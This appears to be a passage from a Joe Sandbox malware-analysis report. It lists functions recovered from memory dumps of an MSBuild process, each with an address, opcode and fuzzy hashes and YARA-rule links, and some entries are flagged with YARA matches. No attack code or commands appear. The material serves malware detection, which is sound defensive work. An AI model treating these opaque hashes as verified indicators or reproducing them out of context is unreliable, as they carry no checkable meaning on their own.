Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bec844938f649ecdc9dab4925ad10d36695e00e76321160889152056a8831eb
Instruction ID: ad56461556e27ada2b7d5aa7d479e4e141568a699ca8e5bcd417eded6f304c4c
Opcode Fuzzy Hash: 7bec844938f649ecdc9dab4925ad10d36695e00e76321160889152056a8831eb
Instruction Fuzzy Hash: FBB17C75A0420ACFCF26CF29D084BB977F0BF08724F28455AD961DB2A5D7B5D842EB90

Uniqueness

Uniqueness Score: -1.00%

Function 01024750 Relevance: .3, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a4050b41c6a135279948fe63c017d1f443f312da45434136b065312031d96b8
Instruction ID: 3e4b32b6332a6c6bee887b53955472851c954a1c93dc72e69923a40a7a1288fe
Opcode Fuzzy Hash: 9a4050b41c6a135279948fe63c017d1f443f312da45434136b065312031d96b8
Instruction Fuzzy Hash: 92815C31A142B6CBEB214EACC8C126DBFA4FF52200F1846BAD5D6CF341C2A4D946D3D1

Uniqueness

Uniqueness Score: -1.00%

Function 0103DBF9 Relevance: .2, Instructions: 244COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8549c86322cfe958a29a8ef1ef3c7120cca5d0c53e5cdecc8be8a9795373b755
Instruction ID: c9a88940a2ca3d2fe54765805b818bc0cdc2644189ec446d75c80d3bb8d45767
Opcode Fuzzy Hash: 8549c86322cfe958a29a8ef1ef3c7120cca5d0c53e5cdecc8be8a9795373b755
Instruction Fuzzy Hash: 0691C272620B06CFE765DF6DC889666BFE4FF95324B548A58D5E6CB2A0C335E411CB00

Uniqueness

Uniqueness Score: -1.00%

Function 010BF7B0 Relevance: .2, Instructions: 242COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 555a641d17ea7be13a5925e79e5de65544541adb83b752ffce3dc9ca82fc3561
Instruction ID: db8b6d38c6cd76bcffa92f72f1b436048dd2da1792ad8ebe0941ba33b67cc39c
Opcode Fuzzy Hash: 555a641d17ea7be13a5925e79e5de65544541adb83b752ffce3dc9ca82fc3561
Instruction Fuzzy Hash: F991C171A00217ABEB55CF28CCC07EABBE5AF48310F1585B8E995DB281D774ED41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 010BF43F Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7e94d9db131bc9d2cc6d67512f8e4262967bc91d97b32f0263d223a28ff76b8
Instruction ID: ac7d24a1257184c4acb24afc9f065d4d13d15506b1c48c139e1ef4f8007ad3a9
Opcode Fuzzy Hash: e7e94d9db131bc9d2cc6d67512f8e4262967bc91d97b32f0263d223a28ff76b8
Instruction Fuzzy Hash: A291F236A001068BDB18CF79C8916BEBBF1FF88311F1981A9E895DB396D738D901CB50

Uniqueness

Uniqueness Score: -1.00%

Function 010B81CC Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeeda9a5aafc8c5ccb6b28ef260fe9846804f300414860ad688ce9ff340e129f
Instruction ID: d69670a20fd33d5f33791ead893c5914b8a845ff53e8d731569b9a84599fbaa3
Opcode Fuzzy Hash: aeeda9a5aafc8c5ccb6b28ef260fe9846804f300414860ad688ce9ff340e129f
Instruction Fuzzy Hash: F3818471E005169BCB14CF6DC8C05EEBBF9FF88610B18C26BD9A1E72A0D7749951CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01000E59 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 460385e16b87304a20b844e72dd3faf48dea21bcbcd9269ab9b95daf1cc4a76e
Instruction ID: 0d8159a8271f0158132c0f621db12d01a5b4805795d4dd2755496646ee83fba4
Opcode Fuzzy Hash: 460385e16b87304a20b844e72dd3faf48dea21bcbcd9269ab9b95daf1cc4a76e
Instruction Fuzzy Hash: BD819471A005599FEB56CE5DC880ABF7BF2FFC5350F288199E8949B289D730D941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 010AE4F6 Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 936efcb63dc5e42708c4eff06eb4b131d9c174f28fb0f9df2e72313df0355194
Instruction ID: ded9cc68f3a6f3952d4a4603d09bc8a40b4e70353366bf09e759da435d50fa75
Opcode Fuzzy Hash: 936efcb63dc5e42708c4eff06eb4b131d9c174f28fb0f9df2e72313df0355194
Instruction Fuzzy Hash: 2B81A072E002159BDB18CFA8C490AADFBF1EF89310B5981A9D996EF385D734DD41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 010AB52F Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
Instruction ID: c9607ef7acb71b1ee17a057170c290032de7cbed196ae632a67384e26db3092b
Opcode Fuzzy Hash: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
Instruction Fuzzy Hash: 4E71A335A0021A9BDF50CFE8C490AFEBFF5BF44740F99415AE981AB241E775D981CB90

Uniqueness

Uniqueness Score: -1.00%

Function 010BAB40 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
Instruction ID: 75d0c2f9ab91e9fcb9554644b142c109af89994a75667b39ebfaa3612998b9a4
Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
Instruction Fuzzy Hash: C0815D71B00209DFDF19DF98C8C0AEEBBF6AF84210F1985A9D9969B345DB34E901CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0101D090 Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
Instruction ID: 5a81c2139f23ea24946779f15c4091266019624992a5367fd1f4da965c51c222
Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
Instruction Fuzzy Hash: BA819D72E001169BDF94DF9CC8847EEFBB2EB84310F29816ADDD5A7244D6359A40CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0102E284 Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f931f236654970e271f86db46ff339a6ac7d5cb848200901a88960c721317f36
Instruction ID: 2737fe0d15afb9adbcd63d48983fa421407dbcd728d9d16c27dcf005c20c0e51
Opcode Fuzzy Hash: f931f236654970e271f86db46ff339a6ac7d5cb848200901a88960c721317f36
Instruction Fuzzy Hash: BD816371A40619EFDB25CFA9C880BEEBBF9FF88354F108429E595A7250D730AC45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0101B950 Relevance: .2, Instructions: 209COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b539623de057aad2cd3392d062b550dfd765e857420aa050e7170a3ab68335e8
Instruction ID: 9d8ea321578087b50ba976efd4a7ea35090e2a0bb1e1ff8d0f95c2eb683177d6
Opcode Fuzzy Hash: b539623de057aad2cd3392d062b550dfd765e857420aa050e7170a3ab68335e8
Instruction Fuzzy Hash: CE7108313042508EE7A4CE2EC980776B7F2AB88745F54859DE9D6CB1CDD73AE902CB60

Uniqueness

Uniqueness Score: -1.00%

Function 010ADAC6 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfd20f509554ac58c87972b4ea3e8a773874cab414b62889bd0af747fec39b98
Instruction ID: ab5c2434907e63578873a34a206d0dad69584be87ff0472c552112b8fd385d73
Opcode Fuzzy Hash: bfd20f509554ac58c87972b4ea3e8a773874cab414b62889bd0af747fec39b98
Instruction Fuzzy Hash: BC818D70D0064A9FDB25CFEAC445AAABBF1EF49700F80849EE4D5ABA46D374D841DF90

Uniqueness

Uniqueness Score: -1.00%

Function 010B70E9 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b015e0fcb5b0f36872f8392eafb085c2b8deea7c231a7535271c0db3859b3d51
Instruction ID: bb0d0cff8147fca913a761055bac7515f17b5f6b2a82d06cef6ee5d2a12f7d88
Opcode Fuzzy Hash: b015e0fcb5b0f36872f8392eafb085c2b8deea7c231a7535271c0db3859b3d51
Instruction Fuzzy Hash: F761B971E0021B9BDB15AFA9C8C55FFB7BAAF94600F104479E991A72C0DB74D9418BA0

Uniqueness

Uniqueness Score: -1.00%

Function 010AF0CC Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f7b073ae8528876059eff57189b3a56c0710b419b7dd72e5ca4ee6fd543e120
Instruction ID: 3f5bb7e261d2dfe7c8d6b8dd8f37f43ae1206d1798f6d8ec866eefa88a911d99
Opcode Fuzzy Hash: 2f7b073ae8528876059eff57189b3a56c0710b419b7dd72e5ca4ee6fd543e120
Instruction Fuzzy Hash: F371A079A00623DBDB64CF9AC08057EBBF1FF45704BA444AED9C29B240D374E991CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0107035C Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
Instruction ID: e898cfbdb31ce9cefea14b6104f7016e9ba6e49547f4ee841f18ba29b9aae3cf
Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
Instruction Fuzzy Hash: 6B716D71E0061AAFDB11DFA9C984EDEBBB8FF48700F104569E545EB290DB34EA01CB94

Uniqueness

Uniqueness Score: -1.00%

Function 010862A0 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38c7a972757c22a7c677e1daf7af36ffee3a63c3ad17def15a2db435cd3a9582
Instruction ID: 08c22d8a59dd430b9e13dadd37c0e8604c4ba03f58d084ba1c892e9ad3c164ea
Opcode Fuzzy Hash: 38c7a972757c22a7c677e1daf7af36ffee3a63c3ad17def15a2db435cd3a9582
Instruction Fuzzy Hash: 1771E631104B01AFE732EF18C844F5ABBE6FF44724F168558E2D68B2A1DB76E944CB50

Uniqueness

Uniqueness Score: -1.00%

Function 010B7A46 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bab8dd2ef5c37e5e497afbbfb6788325f965bf9a9995cff19bea87d17a053f49
Instruction ID: 862507c3439c3aff5e8c613d60cf8e584919b244087e462e37c1c025d00918bd
Opcode Fuzzy Hash: bab8dd2ef5c37e5e497afbbfb6788325f965bf9a9995cff19bea87d17a053f49
Instruction Fuzzy Hash: F451FB75A0012A5BCB159F69C8C0AFABBE6EFC8310F1541ADE9D5DB3C5DA34C942CB90

Uniqueness

Uniqueness Score: -1.00%

Function 010B132D Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93c215b291a74e4d80c680f7f0afdbddd91f905552df1b01654b992cb26608fc
Instruction ID: a633445693b6264fd404fe7e85be54b629d719bcc4a807884758be6f6ed90e84
Opcode Fuzzy Hash: 93c215b291a74e4d80c680f7f0afdbddd91f905552df1b01654b992cb26608fc
Instruction Fuzzy Hash: 7F815B75A00245DFCB09CFA8D490AAEBBF1FF98300F1581A9D859EB355D734EA51CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 010B903E Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57d499b4f26d9f1c10b9e2166b507e8a007dbac40a1852c83e6d155f4d5caeea
Instruction ID: ae60fc738f294b068fd1299e0ab0130f5e8afac5456e606be5eeda365d0840e9
Opcode Fuzzy Hash: 57d499b4f26d9f1c10b9e2166b507e8a007dbac40a1852c83e6d155f4d5caeea
Instruction Fuzzy Hash: 2761A0B1600616AFD715DF69C8C4BEBBBE9FF44714F008629FA9987240DB34E514CB91

Uniqueness

Uniqueness Score: -1.00%

Function 010BFCF2 Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 574134455357d357edfec81b2ac79d08abd8c06373b0c6e14b12488f0bd96b30
Instruction ID: ed1817cc2c4c6418768d3d9ca56299c9fc5f5b3ea48081fe6973ac196a2e0c48
Opcode Fuzzy Hash: 574134455357d357edfec81b2ac79d08abd8c06373b0c6e14b12488f0bd96b30
Instruction Fuzzy Hash: 95618C31A0020BABCB54DF68CC81AFEB7F1FF48310F208569E5A5EB281D774A955CB90

Uniqueness

Uniqueness Score: -1.00%

Function 010B92A6 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac90d7f111664581eab353037c95dab766e8d4c2d0bfd1cdd1279079dea1c3a9
Instruction ID: 1c73abee476f8657b63894de8bedad574fb8e73d758a989e60a4981d2cae2555
Opcode Fuzzy Hash: ac90d7f111664581eab353037c95dab766e8d4c2d0bfd1cdd1279079dea1c3a9
Instruction Fuzzy Hash: 3461FAB16057428BE315DF68C4D4BEABBE4FF90708F1484ADEAD58B291DB35D805C781

Uniqueness

Uniqueness Score: -1.00%

Function 010BCE93 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adaef8c90542e90ae6fae2448e28977f4ff712f71b9da8e8631f75b3b546fe51
Instruction ID: ce9f6543ce54bd0adf0b62d25eee5f8970a666b5f0322b87196c0db27eb2e92d
Opcode Fuzzy Hash: adaef8c90542e90ae6fae2448e28977f4ff712f71b9da8e8631f75b3b546fe51
Instruction Fuzzy Hash: DB5127326046038BE755DE2D89D07EBBBD6AFD1250F1984EDE9E6C7382DA30D80587A1

Uniqueness

Uniqueness Score: -1.00%

Function 0040FB63 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2443671664.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
Instruction ID: 6e943d1810593603b6448cd76830c0a9f33f690627e138932f65f5b37b1890cc
Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
Instruction Fuzzy Hash: 3C5173B3E14A214BD318CE09CC40631B792FFD8312B5F81BEDD199B397CA74E9529A90

Uniqueness

Uniqueness Score: -1.00%

Function 0040FB5A Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2443671664.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11a8754b697e73f602e114cac37bc993403a97748a971c13c490391f567bdbda
Instruction ID: cf2e8f6ee5ed329c4fff6837bee92c7012798be6ab92fe8db7b9a95180ae2fb8
Opcode Fuzzy Hash: 11a8754b697e73f602e114cac37bc993403a97748a971c13c490391f567bdbda
Instruction Fuzzy Hash: E25194B3E14A214BD318CF19CC40631B792EFD8312B5F81BEDD1A9B397CA74E9519A90

Uniqueness

Uniqueness Score: -1.00%

Function 00FEB2D3 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07b9f0fca82a66990b78507c68faec5c43948c37f68b75237ea2122c86698cf4
Instruction ID: 54ce2d58d61da8bbaad4ff561634b2d83c6d0d261c6233f868b4890ccd777239
Opcode Fuzzy Hash: 07b9f0fca82a66990b78507c68faec5c43948c37f68b75237ea2122c86698cf4
Instruction Fuzzy Hash: D04155716006419FDB269F2AD981B6BBBE5FF44724F11843AE699CB291DB31DC00DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0102B570 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff78de6db51d3a33879d67abc73cf438a46a49d9c7e01f50cea854528adf93fd
Instruction ID: 95fe180d66b10644b7492fc15458af20bbb5f74bdeddf36aa10bd9c5f679f132
Opcode Fuzzy Hash: ff78de6db51d3a33879d67abc73cf438a46a49d9c7e01f50cea854528adf93fd
Instruction Fuzzy Hash: 1951D3B16002559FD720EF65CC85FAA77ECEB94728F10062DF9D187195D738D800CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0106D5D0 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
Instruction ID: 1c415a6e177de6a4b8f816714c646d88e811d8d125e2ac6769027f69221c05d7
Opcode Fuzzy Hash: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
Instruction Fuzzy Hash: F851F5767002539BDB11AFA88C40ABB7BE9FF98244F040469FAC5C7251F738C856D7A2

Uniqueness

Uniqueness Score: -1.00%

Function 010195DA Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61be950319e776ae08be945e915dbd34c95d9a15d5ed64d37a4d690ca6bf159d
Instruction ID: 99b308ad795832d9b233362cec7e2271c874197c435b35e9a45ac77651fa35e8
Opcode Fuzzy Hash: 61be950319e776ae08be945e915dbd34c95d9a15d5ed64d37a4d690ca6bf159d
Instruction Fuzzy Hash: DB51A17090020EAFEB629FA5CC90BEEBBB8FF45344F20452AE9D0A7191DB759844DF10

Uniqueness

Uniqueness Score: -1.00%

Function 010B7D73 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d673c11b62b0a19d91b0f3868c3fcaab38d67f80267cd00ca98bb9dcc0b5e56
Instruction ID: 48a3b32b07d09e75589d7d8c0d9a2690b6eca21911731e9e163706437b981373
Opcode Fuzzy Hash: 6d673c11b62b0a19d91b0f3868c3fcaab38d67f80267cd00ca98bb9dcc0b5e56
Instruction Fuzzy Hash: 3951B136A1014A8BCB08CF78C480AEEB7F1EF98314F1582BAD855DB395E734DA15CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00FF7152 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00f5347f932ff1629e3946e82973fb83a232e6aafb0be1fea91cce829c0783f6
Instruction ID: f490540133e3dbe9a536a54f628cbed3e182232c1239ca3739787857763da7ed
Opcode Fuzzy Hash: 00f5347f932ff1629e3946e82973fb83a232e6aafb0be1fea91cce829c0783f6
Instruction Fuzzy Hash: 2351E531A0460EEFEB15EB68C844BBEF7F4FF14315F204169E952972A0DB749915EB80

Uniqueness

Uniqueness Score: -1.00%

Function 0102E443 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e65813d8f9e4df4dceb718af7b57e9bda60296f2153a979bfcbdc116f25ab088
Instruction ID: 89263e7c62cb1ee6f697e2a9f5685cd8e8cbcf94fd9b405b2702730fe830d99f
Opcode Fuzzy Hash: e65813d8f9e4df4dceb718af7b57e9bda60296f2153a979bfcbdc116f25ab088
Instruction Fuzzy Hash: 04517C71240A19DFDB22EF69C980EAAB3FDFF14784F5004AAE581DB660DB34E940CB51

Uniqueness

Uniqueness Score: -1.00%

Function 010145B1 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
Instruction ID: b8bea39bc72a4713740e26c164d8ab048656962d625b3ecec9b44e83f39c91a4
Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
Instruction Fuzzy Hash: D9517D71E0021AABDF15DF98C840BEEBBB5BF49754F044069EA81EB254D778ED44CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01073A6C Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d295475277091a000aea1765de053424dc28d418f55c2a4b679619eb7e8d77fa
Instruction ID: 990cd8d64fa9ff795b8e9ea4c7dbb4e1d5f196e3e23ec980ff99e7689089e5f6
Opcode Fuzzy Hash: d295475277091a000aea1765de053424dc28d418f55c2a4b679619eb7e8d77fa
Instruction Fuzzy Hash: 06517E72E4011D4BEF25CA68D461BFFB3F2FB81310F44085AEA95BF3C0C6666946E654

Uniqueness

Uniqueness Score: -1.00%

Function 0106D800 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

